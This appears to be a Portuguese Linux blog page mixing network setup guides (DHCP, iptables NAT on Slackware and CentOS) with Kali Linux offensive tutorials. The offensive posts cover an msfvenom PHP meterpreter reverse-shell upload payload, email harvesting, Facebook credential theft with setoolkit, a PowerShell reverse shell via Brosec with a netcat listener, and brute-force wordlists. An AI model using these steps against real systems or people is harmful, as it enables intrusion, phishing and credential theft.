Linux em Geral

Linux em Geral

Linux em todos os seus sabores

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

Configurando um Servidor Slackware – DHCP server, Nat com iptables simplificado.

1

Amigos, mais uma vez é um prazer imensuravel estar por aqui e poder compartilhar um pouco do meu conhecimento com essa grande comunidade.

Vamos configurar um Slackware para servir internet e DHCP ?
O video aborda as configurações basicas necessarias para que possamos ter nosso firewall funcinando. Este video será o primeiro de uma serie que farei a respeito do sistema, então vamos lá.

 

[ x ]
 

 

Configurações usadas por mim neste video.

dnsmasq.conf:

Primeiro, faça um backup das configurações atuais.

cd /etc/

mv dnsmasq.conf dnsmasq.conf.bkp

nano dnsmasq.conf

Adicione as linhas em cinza abaixo ou crie as regras de acordo com suas necessidades.
#ARQUIVO DE CONFIGURAÇÃO DHCP SERVER
#DECLARAR ABAIXO A INTERFACE A SER USADA
interface=eth1
#<IP INICIAL>,<IP FNAL>,<MASK>.<LEASE>
dhcp-range=10.22.33.100,10.22.33.120,255.255.255.0,12h
#GATEWAY PADRÃO
dhcp-option=3,10.22.33.1
#SERVIDORES DNS
dhcp-option=6,10.22.33.1
#SERVIDOR DE NOME – SUFIXO DNS
dhcp-option=15,slack-video.prefirolinux.com
#
dhcp-authoritative

rc.firewall
Siga os comandos para a criação do script

cd /etc/rc.d

nano rc.firewall e adicione as seguintes linhas destacadas em vermelho:

#!/bin/bash
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -s 10.22.33.0/24 -o eth0 MASQUERADE

 

[ x ]
 

Ao final dos procedimentos, dar permissão de execução aos seguintes arquivos.

rc.firewall – rc.dnsmasq – rc.ip_forward

Para tal use, chmod +x <nome do script>.

Bom, isso é tudo por enquanto .

Abraços e até a proxima !!

 

Coletando Endereços de Email’s com Kali Linux

0

Boas Users!

Vou mostrar como coletar, endereços de email’s de um determinado domínio.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos usado:

# msfconsole

msfconsole= Framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

 

 

[ x ]
 

msf > use auxiliar/gather/search_email_collector

use auxiliar= Carregando o modulo email_collector

msf > set DOMAIN "domínio.com.br"

set DOMAIN= Selecionando o domínio

msn > run

run= Iniciando a coleta

 

 

Servidor DHCP CentOS

0

Boas Users!

Vou mostrar como configurar um servidor DHCP, no CentOS 7.

 

Comandos:

# su -

su –= ativa o super usuário “root”

# yum update

yum= é uma ferramenta utilizada para gerenciar a instalação e remoção de pacotes em distribuições Linux, que utilizam o sistema RPM.

update= Atualiza o sistema de arquivos.

# yum install dhcpd

install= Instala

# systemctl enable dhcpd

systemctl= Ferramenta para gerenciar serviços

enable= Habilita

# systemctl start dhcpd

start= inicia

# ifconfig

ifconfig= é usado para atribuir um endereço para uma interface e/ou configurar parâmetros de interface de rede

# vi /etc/sysconfig/network-scripts/ifcfg-enp0s3

vi= Editor de texto

OBS: Lembrando que “enp0s3” é a placa de rede gerada “virtualbox”, substitua pela placa de rede do seu computador.

DEVICE=enp0s3
BOOTPROTO=static
BROADCAST=192.168.1.255
IPDDR=192.168.1.128
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
ONBOOT=yes
TYPE=Ethernet
PEERDNS=no

DEVICE= Identificação da placa de rede “nome”

BOOTPROTO= static “ip fixo” ou Dynamic “ip recebido pelo servidor DHCP”

IPADDR= Aqui colocamos o “IP”

NETMASK= Mascara da rede

GATEWAY= é uma máquina intermediária geralmente destinada a interligar redes, separar domínios de colisão, ou mesmo traduzir protocolos.

NETWORK= Faixa de IP`s

ONBOOT= yes > ativa placa de rede, no > não ativa a placa de rede no boot

PEERDNS= responsável por gerar o DNS no arquivo “/etc/resolv.conf”

# vi /etc/sysconfig/network-scripts/ifcfg-enp0s8

enp0s8= Placa de rede, que vai distribuir internet.

# service network restart

Reiniciando a rede

DEVICE=enp0s8
BOOTPROTO=static
BROADCAST=10.0.0.255
IPADDR=10.0.0.1
NETMASK=255.0.0.0
NETWORK=10.0.0.0
GATEWAY=10.0.0.1
ONBOOT=yes
# vi /etc/resolv.conf

aqui configuramos o DNS:

nameserver 192.168.1.1

OBS: pode ser o seu DNS preferido, ex: 8.8.8.8 ou 8.8.4.4, que são os DNS do google.

# vi /etc/dhcpd/dhcpd.conf

Configuração do arquivo DHCP:

default-lease-time 600;
max-lease-time 7200;
authoritative;

subnet 10.0.0.0 netmask 255.0.0.0 {
range dynamic-bootp 10.0.0.100 10.0.0.200;
option domain-name-servers 8.8.8.8, 8.8.4.4;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
}

default-lease-time = Controla o tempo de renovação dos endereços de IP´s

max-lease-time = determina o tempo máximo que uma estação pode usar um determinado IP.

authoritative= Terminais mesmo que estes possuam, configurações erradas de rede, ou possuam IPs que não sejam da subnet configurada no servidor.

subnet= classe de ip

range dynamic-bootp= IP’s que seraão liberados

option domain-name-servers=  É um computador com uma espécie de banco de dados que relaciona o endereço “nominal” de um site como www.uol.com.br com o endereço real onde está a página na rede, para poder acessá-la.

option domain-broadcast-adrress=

option routers= rota do tráfego

Agora vamos criar um script do roteamento, para liberar internet.

# vi /usr/bin/firewall

OBS: pode criar com o nome de sua preferência, no meu caso criei “firewall”.

#!/bin/bash
iptables -F 
iptables -t filter -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -s 10.0.0.0/255.0.0.0 -o enp0s3 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -s 10.0.0.0/12 -j ACCEPT
iptables -A FORWARD -d 10.0.0.0/12 -j ACCEPT

iptables= é o nome da ferramenta do espaço do usuário que permite a criação de regras de firewall e NATs.

-F= apaga todas as regras

-t= parâmetro tabela

-P= define uma regra padrão

-A=acrescenta uma nova regra às existentes

-s= especifica a origem do pacote. Origem que pode ser informada como

-o= identifica a interface de saída do pacote, com a mesma sintaxe descrita acima em -i

FORWARD= consultado para dados que são redirecionados para outra interface de rede ou outra máquina

POSTROUTING= consultado para os dados que precisam ser modificados logo que chegam (DNAT e redirecionamento de portas)

ACCEPT= O pacote é ACEITO e o processamento das regras daquele chains é concluído

filter= nome da tabela

# chmod +x /usr/bin/firewall

chmod= é um utilitário via linha de comando usado nos sistemas Linux/Unix/Unix-like para mudar as permissões de um arquivo ou diretório.

+= adiciona

x= execução

# vi /etc/rc.d/rc.local

Agora vamos adicionar na ultima linha, do arquivo “rc.local” para iniciar o script “firewall” no boot.

 

 

[ x ]
 

bash /usr/bin/firewall

salve e assim, estará rodando o seu servidor. Boa Sorte!

Download dos arquivos de configurações do CentOS aqui.

em relação ao editor de texto “vi”, quem não está familiarizado, consulte aqui.

 

By user777

 

 

 

Personalizando terminal “Kali Linux”

0

Boas Users!

Hoje vou ensinar, como personalizar o terminal do kali linux, muito simples.

 

Comandos Utilizados:

Antes de mais nada, entrar no diretório inicial do usuário:

# cd ~
# leafpad .user777

leafpad = editor de texto padrão do kali linux

.user777= nome do arquivo que escolhi, coloque o nome que achar melhor, mas não esquecendo do (.) ponto no inicio do arquivo, assim ele fica oculto no sistema.

# chmod +x

chmod= gerencia as permissões no linux

+x= Permissão de execução

# leafpad .bashrc

.bashrc= Arquivo do terminal

# cat ~/.user777

cat= lista um arquivo na tela

~= diretório inicial do usuário

Links dos geradores:

http://patorjk.com/software/taag/#p=d

http://joshua.einhyrning.com/wtfig/

 

By user777

 

 

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

Invadindo com Power Shell kali Linux

0

Boas Users!

Vou demonstrar mais uma vulnerabilidade “sistemas Windows”

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Comandos Utilizados:

# apt-get install npm build-essential g++ xsel
# npm install -g n
# npm config set registry http://registry.npmjs.org/
# n latest
# git clone https://github.com/gabemarshall/Brosec.git

git clone = Faz o download do Brosec

# cd Brosec && npm install

cd Brosec && npm install = Entra no diretório Brosec e instala p npm

# ./bros

./bros = Iniciando o script

# set LHOST (seu IP)

LHOST = IP do atacante

# set LPORT 4444

LPORT = Porta utilizada

# 5

5 = Miscellaneos que significa “Variado”

# 1

1 = Reverse shell

# 4

4 = Reverse Shell PSH

# N

N = “Não” “Should I start a tcp listener on port for you”

# netcat -lnp 4444 -vv

Iniciando o serviço

 

Fonte: https://github.com/gabemarshall/Brosec

 

By user777

 

 

 

 

Instalando Teamviewer no Kali Linux

0

Boas Users!

Hoje vou ensinar como instalar o famoso Teamviewer no kali linux, vamos la!

#dpkg --add-architecture i386

1

#apt-get update

 

#wget -c https://download.teamviewer.com/download/teamviewer_i386.deb

 

 

#dpkg -i teamviewer_11.0.57095_i386.deb

2

#apt-get -f install

1

Pronto pessoal, assim finalizamos a instalação!

 

By user777

Previsão do tempo utilizando o Curl Kali Linux

0

Boas Users!

A nível de curiosidade, irei demonstrar como saber a previsão do tempo no kali linux, bem vamos lá!

 

 

Comandos utilizados:

# curl wttr.in/:help
# curl wttr.in/saopaulo
# curl wttr.in/recife
# curl wttr.in/moon

 

Bem é isso pessoal!

 

By user777

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777